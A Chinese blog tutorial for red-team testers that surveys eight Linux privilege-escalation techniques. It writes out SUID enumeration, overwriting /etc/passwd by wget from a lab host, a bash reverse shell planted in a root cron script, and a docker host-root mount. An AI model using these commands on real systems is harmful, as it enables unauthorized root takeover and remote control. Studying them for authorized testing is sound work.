HW之红队常见Linux的几种提权方法

前言

不管是 Windows 提权还是 Linux 提权，方法都非常之多，实际情况下，还是需要根据对应的情况选择对应的提权方法,今天就Linux常见的几种提权方式做个整理

Linux常见的几种提权方法

提权，提高自己在服务器中的权限，主要针对网站入侵过程中，当渗透某一网站时，通过各种漏洞提升WEBSHELL权限以夺得该服务器权限，通常提权是把普通用户的权限提升到管理员权限或者系统权限，在渗透测试过程中，拿到一个webshell之后，一般来说，我们的权限都是目标服务器中间件的权限。

这个时候就需要利用各种漏洞来提升自己的权限，从而能够获得对目标服务器的控制。

1.内核溢出提权

简介

利用堆栈溢出漏洞，根据当前系统 寻找对应的漏洞的exp 使用exp对其进行提权。

复现

第一步：查看目标系统的相关信息
uname -a #查看内核/操作系统/cpu信息
cat /proc/version #查看系统信息
cat /etc/issue #查看操作系统版本
lsb_release -a #查询系统版本等信息

第二步：使用searchsploit工具寻找对应的exp

searchsploit -t 3.19

1.png

searchsploit -x linux/local/37292.c

2.1.png

第三步：让目标机器远程下载exp文件

3.png

第四步：将exp文件进行编译

2.png

第五步：执行exp文件，提权成功

4.png

2.Linux suid提权

简介

SUID是赋予文件的一种权限，它会出现在文件拥有者权限的执行位上，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。

也就是如果ROOT用户给某个可执行文件加了S权限，那么该执行程序运行的时候将拥有ROOT权限。

复现过程

第一步：发现系统上运行的所有SUID可执行文件

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

5.png

第二步：利用带s的文件执行本地sh’shell

6.png

ps：常见的suid提权文件：nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget

3.passwd提权

简介

基础知识/etc/passwd: 文件中的详细信息格式

7.png

复现

第一步：通过OpenSSL命令，生成一个新的用户oooohack，密码为hack123

openssl passwd -1 -salt oooohacker hack123

将/etc/passwd文件内容复制出来，然后将第一步的结果进行追加到passwd文件中

8.png

第二步：让目标远程下载文件，并覆盖原先的passwd文件

wget http://192.168.0.134/passwd -O /etc/passwd

9.png

第三步：切换用户，提权成功

10.png

4.ssh密钥提权

简介

ssh是一种加密的网络传输协议。可在不安全的网络中为网络服务提供安全的传输环境。

SSH通过在网络中创建安全隧道来实现SSH客户端与服务器之间的连接。

SSH最常见的用途是远程登录系统，人们通常利用SSH来传输命令行界面和远程执行命令。

使用频率最高的场合类Unix系统，但是Windows操作系统也能有限度地使用SSH。

2015年，微软宣布将在未来的操作系统中提供原生SSH协议支持，Windows 10 1809 版本已提供可手动安装的 OpenSSH工具。总的来说是一个传输协议，默认端口22

复现

第一步：cat /etc/passwd | grep bash # 过滤出含bash的用户

11.png

第二步：ls /home/web1 # 查看用户目录下的文件，寻找.ssh

12.png

第三步：进入.ssh，对比authrizid_keys和id_rsa.pub，若一致则说明公钥相同

13.png

第四步：将公钥对应的私钥文件复制

14.png

第五步：保存，并且设置权限

15.png

第六步：利用ssh直接进行远程登陆，提权成功

16.png

5.环境劫持提权

简介

环境劫持需要的两个条件 存在带有suid的文件 suid文件存在系统命令

复现过程

第一步：寻找suid文件

find / -perm -u=s -type f 2>/dev/null

17.png

第二步：查看suid文件里面执行的是哪些命令，要能够被我们所利用，比如ps命令

18.png

第三步：新建一个文件，文件内容为：/bin/bash，文件名是ps，设置环境变量的改变，提权成功

19.png

6.john破解shadow root密文登录提权

简介

需要一定的权限，将shodow文件中的root密文复制到一个新的文件中，使用工具破解即可。

复现过程

第一步：直接使用工具

20.png

7.Ubuntu计划任务反弹shell提权

简介

利用计划任务，和windows里面的开机启动任务类似。

复现过程

第一步：当获取一个linux普通用户的时，查看计划任务

21.png

第二步：crontab -l 查看当前用户的任务

22.png

第三步：tail -f /var/log/syslog，查看日志文件 发现root每一分钟会执行一次 cleanup.py文件

23.png

第四步：更改cleanup.py文件里面的内容，做一个反弹shell。提权成功

bash -i >& /dev/tcp/192.168.0.109/6666 0>&1

24.png

8.docker 提权

简介

docker运行的所有命令都是需要sudo来运行，那是因为docker需要root权限才能跑。

Docker监护进程有一个特性，它能被允许访问root用户或者是在docker组里面的所有用户。

这就意味着，有docker 组的权限就如同到root的访问权，而且不需要知道密码。

复现

第一步：查看目标机器是否使用了docker

cat linux.txt | grep docker

25.png

第二步：查询当前用户信息和组信息，查询是否存在docker组

26.png

第三步：利用docker，将mnt目录挂载到宿主的根目录，提权成功

docker run -v /:/mnt -it alpine

27.png

原文链接：https://blog.csdn.net/hackzkaq/article/details/125047703